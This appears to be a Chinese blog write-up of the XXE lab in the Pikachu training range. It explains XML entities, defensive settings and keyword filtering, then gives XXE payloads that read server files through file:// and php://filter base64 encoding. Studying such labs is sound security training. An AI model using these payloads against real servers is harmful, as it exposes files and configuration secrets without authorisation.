Pikachu系列——XXE

Pikachu靶场系列持续更新~

要像追剧追番一样追下去哦

实验九 —— XXE

XXE概述

xml外部实体注入
攻击者通过向服务器注入指定的xml实体内容，从而让服务器按照指定的配置进行执行，导致问题。xxe漏洞触发的点往往是可以上传xml文件的位置，也就是说服务端接收和解析了来自用户端的xml数据，而又没有做严格的安全控制，从而导致xml外部实体注入。

危害
加载恶意外部xml文件
文件读取
命令执行
内网端口扫描
攻击内网网站
发起dos攻击等危害

XML概念
XML是可扩展的标记语言，设计用来进行数据的传输和存储，结构是树形结构，有标签构成，这点很像HTML语言。但是XML和HTML有明显区别如下：
XML ----- 被设计用来传输和存储数据
HTML ----- 被设计用来显示数据

XML结构

第一部分：XML声明部分
<?xml version="1.0"?>

第二部分：文档类型定义 DTD
<!DOCTYPE note[ 
<!--定义此文档是note类型的文档-->
<!ENTITY entity-name SYSTEM "URI/URL">
<!--外部实体声明-->
]>

第三部分：文档元素
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

其中，DTD（文档类型定义），用来为 XML 文档定义语法约束，可以是内部申明也可以使引用外部DTD。
① 内部申明DTD格式
<!DOCTYPE 根元素 [元素申明]>
② 外部引用DTD格式
<!DOCTYPE 根元素 SYSTEM "外部DTD的URI">
③ 引用公共DTD格式
<!DOCTYPE 根元素 PUBLIC "DTD标识名" "公共DTD的URI">

XML中对数据的引用称为实体，实体中有一类叫外部实体，用来引入外部资源，有SYSTEM和PUBLIC两个关键字，表示实体来自本地计算机还是公共计算机，外部实体的引用可以借助各种伪协议，比如如下三种，具体的示例可以看下面的xxe靶场实验：
file:///path/file.ext
http://url
php://filter/read=convert.base64-encode/resource=conf.php

防御：
①禁用外部实体
PHP：
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false);
Python：
from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
②过滤用户提交的XML数据
过滤关键词：<!DOCTYPE和<!ENTITY，或者SYSTEM和PUBLIC。

实验环境

我用的是phpstudy集成环境，一键搭环境 ~~（如果端口没被占用还是比较顺利的）~~

靶场：Pikachu靶场下载
浏览器一个

接下来:
–>把下载下来的pikachu文件夹放到web服务器根目录下
–>根据实际情况修改inc/config.inc.php里面的数据库连接配置（登录名和密码要与数据库相同）
–>访问http://x.x.x.x/pikachu,会有一个红色的热情提示"欢迎使用,pikachu还没有初始化，点击进行初始化安装!"，点击即可完成安装。

XXE

先提交一个正常的 xml 数据

<?xml version = "1.0"?>
<!DOCTYPE note [ <!ENTITY xxe "test"> ]>
<name>&xxe;</name>

payload中 &xxe; 是用来将xxe这个实体进行调用，xxe实体成功在前端回显。

读取服务器/本地文件(事先创建一个文本文件)

提交下面这样的payload，利用file://协议就能看到服务器/主机上的文件内容
_{这个XXE的file://协议一开始我用的5.3版本(失败)，后来换的5.4的php环境才成功}

<?xml version = "1.0"?>
<!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///D://phpStudy//PHPTutorial//WWW//pikachu//xxe.txt"> ]>
<x>&xxe;</x>

利用php://协议的filter过滤器以base64格式读取服务器/本地文件

<?xml version = "1.0"?>  
<!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]>   
<x>&xxe;/x>

GOT IT！

******************************************************
这一XXE模块先搞定了，关注收藏追更哦~

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

Pikachu系列——XXE

Pikachu靶场系列持续更新~

实验九 —— XXE

XXE概述

实验环境

XXE

sql注入繞waf小Tips

Netcat安裝使用詳解

騰訊T-Star高校挑戰賽

文件上傳__常用bypass小結

PhpMyAdmin4.8.1文件包含漏洞分析及復現利用(CVE-2018-12613)

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結